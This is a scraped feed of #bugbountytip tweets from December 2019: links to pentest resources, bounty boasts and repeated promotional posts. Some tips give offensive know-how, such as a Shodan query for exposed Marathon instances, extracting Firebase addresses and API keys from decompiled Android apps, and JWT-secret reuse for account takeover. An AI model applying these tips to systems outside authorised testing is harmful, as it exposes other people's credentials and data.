Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-12-06 03:06:03
6 -Windows Notes + Cheatsheet.pdf: https://t.co/lVxi7uImty -Windows Privilege Escalation Fundamentals.pdf: https://t.co/raueoqhVVH -Linux Notes + Cheatsheet.pdf: https://t.co/rrdCBWkbOT -Docker for Pentesters.pdf: https://t.co/Wl6qXHe6XI #bugbountytip #redteam #PenTest #Hacking
bayani elogada
@metamudkip


2019-12-06 02:14:16
0 If you're discouraged from joining unrewarding bug bounty programs, listen to @JessieJ: "We're paying with love tonight." #bugbounty #bugbountytip
fadetoblack
@hardweired


2019-12-05 19:59:55
0 If you're Testing for SSRF or blind XXE and it should takes time to be executed or Invalidated redirections to steal tokens : https://t.co/uHMg4rJD69 This tool is awesome to Test for those kind of bugs #bugbountytips #bugbountytip https://t.co/efC5pv0SZ4
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-12-05 18:43:44
0 Is their anything more beautiful than this in bug bounty #bugbounty #bugbountytip thanks @h1_sp1d3r @hakluke @stokfredrik @Rhynorater https://t.co/z6iavoWzgc
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-12-05 16:25:09
1 #bugbountytip Detect Unix Command injectio Payloads: https://t.co/Jz35dKi8KS Detect in response: regexp for burp suite. https://t.co/J0bS7ViC9C And 30 secod delay. It is all.
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-05 14:17:45
0 OnePlus #Breached Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/VVsLLbfvum
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-05 14:14:39
1 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/yJGb5KrEnU
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-05 14:14:21
0 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/mzFcIOkL8E
Rafin Rahman Chy
@rafinrahmanchy


2019-12-05 13:24:00
1 Facebook Bug Bounty Blogs/WriteUps : https://t.co/CKdsEXouCz https://t.co/rzoYk67VS6 https://t.co/xeQiLCoQbM https://t.co/7y70R706W1 https://t.co/E96wwBPfc6 https://t.co/hfAsZqb9tI https://t.co/ZxPANapI5l https://t.co/SJGiC0xChE https://t.co/d57e8Seq9m #BugBounty #bugbountytip https://t.co/L02NnprDQB
Anas Mahmood ๐Ÿ‡ต๐Ÿ‡ฐ
@AnasIsHere


2019-12-05 12:28:29
6 #XSS like a Pro ๐Ÿ˜Ž Just published another interesting writeup. Must read the full blog post Writeup: https://t.co/HlXk9esUv3 #BugBounty #BugBountyTip #Hacking #vulnerability
TvM
@tvmpt


2019-12-05 12:12:22
0 Quick and dirty way to import a big url list into burpsuite cat file | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s #quickanddirtytip #bugbountytip #oneliner #bugbountytips
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-05 09:14:20
7 Cross Site Scripting Basics - #XSS https://t.co/0wdvBhdOHw Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-05 09:06:33
0 >> kali-undercover To Start #UNDERCOVER Mode in Kali 2019.4 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/F5IhdmmCzF
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-05 09:04:28
0 Update Your Kali and Get the Kali Undercover mode that looks like Windows OS ! Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops https://t.co/o7JrVLrhGx
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-05 09:01:35
0 PyXie Rat - Python Rat to Escalate Windows Permissions Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/eFwqj2ozDj
bugbountytip
@a_l_e_r_t_1_


2019-12-05 08:29:09
0 6 download for 50 + . GOOD HACKING !!! #bugbountytips #bugbountytip
Ajay Gautam
@evilboyajay


2019-12-05 07:06:04
4 I discovered a new kind of web application authentication bypass by accident while doing pentest and thought of sharing with you all <3 #infosecmatters #ethicalhacking #informationsecurity #cybersecurity #infosec #bugbountytip https://t.co/cFnTkaEFG2
ph0rensic
@ph0rensic


2019-12-05 01:15:20
0 I received $ 900 in a private program Hackerone! There is still time to hit the goal! I needed some arguments with the evaluator, always research what you're debating! https://t.co/TDQWkEfNMq #BugBounty #bugbountytip
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-12-05 00:30:46
0 #bugbountytip 99.99% of xss on public programs is dumpicates I got it
robre
@_robre


2019-12-04 21:06:25
1 @NathOnSecurity Hey little tip: open two windows of acunetix, double your income. #bugbountytip
@cr33pb0y
@theyiyibest


2019-12-04 20:05:09
0 Yay, I was awarded a 4 x $X00 bounty on @Hacker0x01! https://t.co/7vrkzfnbNA #TogetherWeHitHarder Recipe to this one: - Google Dorks - XSS reflected - Repeat first step. #bugbounty #bugbountyprogram #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-04 18:58:36
0 Maximise Bug Bounty Scope - Gather Subdomains using Facebook Certificate Transparency https://t.co/AjSRBqt57p #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone
intigriti
@intigriti


2019-12-04 15:47:09
9 โš ๏ธOpen staging environments can lead to production account takeover โœ”๏ธIf they use a separate DB, but same JWT secret โœ”๏ธIf the username or e-mail address is used as identifier This is an excellent #BugBountyTip, thanks @kapytein! https://t.co/yZkBoDBO1d
Tragger Osbourne
@OsbourneTragger


2019-12-04 15:24:58
0 apps,I realized after reverse engineer,using tool like apktool,I was app to look at the AndroidManifest see all permissions, which often lead to stringxml where I would find content delivery ,login ID & pass,fB tokens,googleapi, #bugbountytips #bugbountytip #togetherwehitharder https://t.co/ZBq3acOAoI
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-12-04 12:19:07
1 #bugbountytip All in one for Bug Bounty Hunters and pentesters https://t.co/lRPVHMHKAo
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-12-04 00:37:38
3 -Pen-testing resources.pdf: https://t.co/eykvQfDT5g -Shellcode: Encrypting traffic.pdf: https://t.co/QMsNonNYPZ -huge list of pentest tookit.pdf: https://t.co/LM0XUQb2AI -Information Gathering with theHarvester.pdf: https://t.co/ZFWOVqotm6 #bugbountytip #Hacking #osint #redteam
Tragger Osbourne
@OsbourneTragger


2019-12-03 22:31:18
0 I just find a bug ๐Ÿœ on android app Using firebase , I use apktool Then I look for AndroidManifest.xml , I found firebase they , I look for address in string.xml , I found firebase database and api keys ๐Ÿ”‘ #bugbountytip #bugbountytips #togetherwehitharder
แด‚
@pouyana1


2019-12-03 21:55:59
3 Of course that James Kettle articles are something else. @albinowax https://t.co/nsTQZFfzMX #bugbountytip #infosecurity #Security #websecurity
haxor_raheem
@HaxorRaheem


2019-12-03 18:31:52
1 Anyone know how to inject a "href" payload in "h1" payload . @Bugcrowd @Hacker0x01 #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-03 18:26:53
9 Exposed Log Files - https://t.co/Kft6p37wJM Exposed Firebase DB - https://t.co/WGzatNLO3C Exposed Github Passwords- https://t.co/sGVY9UloQQ Hacking GraphQL - https://t.co/Z4ZBm3bN82 XSS SVG - https://t.co/5k3dGwkaGA #BugBounty #bugbountytips #bugbountytip #infosec #osint
Sebastian Wieseler
@kickino


2019-12-03 15:30:20
2 Controversial #bugbountytip Schedule meetings with (defence) vendors and learn about their technics and technologies. Engage with them during product demos and establish a deeper understanding of their products. You can also use โ€œblueโ€ knowledge for โ€œredโ€ approaches or #bugbounty
แด‚
@pouyana1


2019-12-03 09:42:57
0 bugbounty tips : find hidden HTTP headers and inject them, simple way to reach high risk bugs. #BugBounty #bugbountytips #bugbountytip
Shaurya Sharma
@ShauryaSharma05


2019-12-03 08:39:35
0 I just finished writing a blog and it's a great read for those who are trying their luck in bug bounty "Havenโ€™t founded any bounties yet? Hunt for these vulnerabilities in web applications for a better bounty!" https://t.co/NRSjy03JN5 #bugbounty #hacking #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-12-03 08:28:35
0 #bugbountytip find open prod marathon instances in shodan. - โ€œX-Marathon-Leaderโ€ - โ€œssl:Redactedโ€ โ€œX-Marathon-Leaderโ€
soon
@soon73564093


2019-12-03 06:32:33
1 Bingo xss <3 #bugbounty #bugbountytip https://t.co/d6FilP9MWs
Shoeb Patel
@0xCaptainFreak


2019-12-03 04:08:04
0 I constantly take time out of App Security and learn something else to keep things interesting. System Design and Competitive programming Interests me a lot. 1. https://t.co/SpMqOJ40sE 2. https://t.co/hhWuOhB85V #bugbountytips #bugbountytip
SerWaf
@serialwaffle


2019-12-03 02:24:57
0 Can someone explain to me how the directories work in #hackerone? If I understand correctly, all of the directories are fair game (if I stick to the in-scope items of course). Can I just pick a Co. and start hunting???#bugbounty #bugbountytip @Hacker0x01
Sanketh Sharath
@sharathsanketh


2019-12-03 02:18:19
2 Web application architecture:Principles, protocols and practices by Shklar & Rosen seems to be a great book! It's doing a world of good to me in making me understand how web apps work. Definitely recommended for those getting into bugbounty #bugbountytips #bugbounty #bugbountytip